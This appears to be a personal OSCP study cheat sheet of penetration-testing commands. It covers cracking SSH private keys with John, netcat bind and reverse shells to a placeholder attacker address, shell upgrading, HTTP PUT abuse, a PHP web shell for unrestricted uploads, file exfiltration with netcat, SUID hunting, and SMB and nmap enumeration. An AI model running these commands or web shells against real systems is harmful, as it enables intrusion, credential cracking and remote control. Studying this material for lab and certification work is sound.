oscp tips

cracking ssh keys (id_rsa) with john

With John, we can crack not only simple password hashes but also SSH Keys. It is pretty simple, so let's get started.

#copying the SSH Key that we have to crack

cp ~/.ssh/id_rsa id_rsa

We will need a script, ssh2john.py. It comes along with Kali so, you don't really need to download it.

#finding the file

updatedb

locate ssh2john.py

cp $(locate ssh2john.py) .

#now, we will create a hash using it

python ssh2john.py id_rsa > id_rsa.hash

Now, let's find and copy rockyou.txt.gz, our wordlist.

locate rockyou.txt

cp $(locate rockyou.txt) .

#now, unzip the file

gunzip rockyou.txt.gz

Finally, let's use john and rockyou.txt to try and crack the SSH Key.

john id_rsa.hash -wordlist=rockyou.txt

There you go!

copying with base64 encoding

[user@server]$ base64 -w 0 file_we_want_to_copy

c2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2Fkmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZA==

[root@kali]# echo -n 'c2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2Fkmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZHNhZGZzYWRmYXNkZnNkc2FkZnNhZGZhc2Rmc2RzYWRmc2FkZmFzZGZzZA==' | base64 -d > file_we_want_to_copy

turn rev shell interactive

$ python -c 'import pty;pty.spawn("/bin/bash")'

[user@server]$ ^Z

[1]+ Stopped            nc -nlvp 4444

[root@kali]# stty raw -echo

[root@kali]# nc -nlvp 4444

[user@server]$ export TERM=xterm

[user@server]$ echo "fully interactive shell!"

python http server

When you need a quick web server running and serving the files in the current directory you executed it use Python's SimpleHTTPServer

$ python -m SimpleHTTPServer 8000 #python2

$ python3 -m http.server 8000 #python3

how to get cookies' values from browser

ever felt lazy to use JS or burp? here you will find how to get cookies' values from browser: https://kb.iu.edu/d/ajfi

abusing http methods

given the few resources online I could find explaining how to abuse http methods missconfigured, I decided to write a small piece of information.

if we get to find some webpage with PUT method allowed, for instance using nmap:

nmap --script http-methods --script-args http-methods.url-path='/website' <target>

or using nikto:

nikto -h http://host

or using cURL:

curl -v -X OPTIONS http://host

or Metasploit.

Then we can abuse it with several tools, such as netcat:

nc www.host.com 80

PUT /hello.htm HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Host: www.host.com

Accept-Language: en-us

Connection: Keep-Alive

Content-type: text/html

Content-Length: 182

<html>

<body>

<h1>Hello, World!</h1>

</body>

</html>

with cURL:

curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.host.com/newpage

curl -X PUT -d "text or data to put" http://www.host.com/destination_page

curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://host.com/new_page

suid bit lookout

command to look for setuid bit set executables:

$ find / -perm -u=s -type f 2>/dev/null

pattern generator

when metasploit-framework pattern_creator.rb is not available, this online resource may come handy:

https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html

measuring traffic with iptables

handy way to calculate number of in/out packets while performing nmap scan or any other connection:

# iptables -I INPUT -s 10.11.1.22 -j ACCEPT

# iptables -I OUTPUT -d 10.11.1.22 -j ACCEPT

# iptables -Z

# nmap -sT 10.11.1.22

# iptables -vn -L

bind / reverse shells with netcat

bind shell (connecting from alice to bob, bob's ip is publicly addressable)

bob@win: C:\Users> nc -nlvp 4444 -e cmd.exe

alice@linux: #nc -nv a.b.c.d 4444

reverse shell (connecting from bob to alice, being alice behind a firewall)

alice@linux: # nc -nv a.b.c.d 4444 -e /bin/bash

bob@win: C:\Users>nc -nlvp 4444

smashing the stack mega basics

the total absence of extremely newbie food regarding how the stack works and how it can be smashed in order to accomplish buffer overflow attacks made me research throughout all the web looking for the best resources, here I will list some of them:

[UPDATE] BEST RESOURCE IN WHOLE INTERNET: dostackbufferoverflowgood

̶S̶A̶N̶S̶ ̶f̶o̶r̶ ̶d̶u̶m̶m̶i̶e̶s̶

̶w̶e̶l̶l̶ ̶e̶x̶p̶l̶a̶i̶n̶e̶d̶ ̶t̶h̶e̶o̶r̶y̶

̶t̶h̶e̶ ̶v̶e̶r̶y̶ ̶c̶l̶a̶s̶s̶i̶c̶

̶l̶i̶v̶e̶o̶v̶e̶r̶f̶l̶o̶w̶ ̶y̶o̶u̶t̶u̶b̶e̶ ̶c̶h̶a̶n̶n̶e̶l̶

sending file with netcat

On your server (A):

nc -l -p 1234 -q 1 > something.zip < /dev/null

On your “sender client” (B):

cat something.zip | netcat server.ip.here 1234

cheatsheets

reverse shell cheatsheet: http://www.pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

basic linux privilege escalation cheatsheet: http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

radare r2 cheatsheet: http://www.github.com/radare/radare2/blob/master/doc/intro.md

unrestricted file upload

possible way to take advantage of an unrestricted file upload within a profile picture section in a web server

echo "<?php system(\$_GET['cmd']); ?>" > exploit.php

copy image address results in the following url being copied to our clipboard: //www.nop.cat/admin/ftp/objects/XXXXXXXXXXXX.php

smb enumeration

Server Message Block (SMB) protocol’s security track record has been poor for more than 10 years, due to its complex implementation, and open nature.

SMB versions clarifications: o SMB1 – Windows 2000, XP & Windows 2003

o SMB2 – Windows Vista SP1 & Windows 2008

o SMB2.1 – Windows 7 & Windows 2008 R2

o SMB3 – Windows 8 & Windows 2012

here find some ways to identify SMB netbios service:

using nmap:

nmap -p 139,445  -oG smb.txt 192.168.1.100‐254

using nbtscan (available in kali linux):

nbtscan  -r 192.168.1.0/24

null sessions allow unauthenticated servers (or hackers) to obtain browse list from other MS servers. this means it’s possible to access large amounts of information about the machine, such as pwd policies, usernames, group names, machine names, users and host ids. this feature existed in SMB1 by default, later restricted though.

enum4linux is a tool that extracts information from a windows computer using a SMB null session (also present in kali)

enum4linux -a 192.168.1.26

remember nmap NSE scripts? also possible to discover & enumerate SMB services. can be found in /usr/share/nmap/scripts directory, as many flavours as you can imagine, just type:

ls -l /usr/share/nmap/scripts/smb*

useful nmap scans

listing versions and use default scripst (beware some of those scripts are considered intrusive):

$ nmap -sV -sC nop.cat

enumerate and find as much information of the top 1000 ports (recommended first scan):

$ nmap --top-ports 1000 -T4 -sC nop.cat

network sweeping:

$ nmap -sn 192.168.11.200-250

scan for the top 20 TCP ports and save output in a file:

$ nmap -sT -A --top-ports=20 192.168.11.200-250 -oG top-port-sweep.txt

banner grabbing, service ennumeration:

$ nmap -sV -sT 192.168.1.100

OS identifying:

$ nmap -O 10.0.0.10

attempt to connect to the SMB service:

$ nmap 10.17.140.100 --script smb-os-discovery.nse

DNS zone transfer NSE script

$ nmap --script=dns-zone-transfer -p 53 nop.cat

Google Sites

Report abuse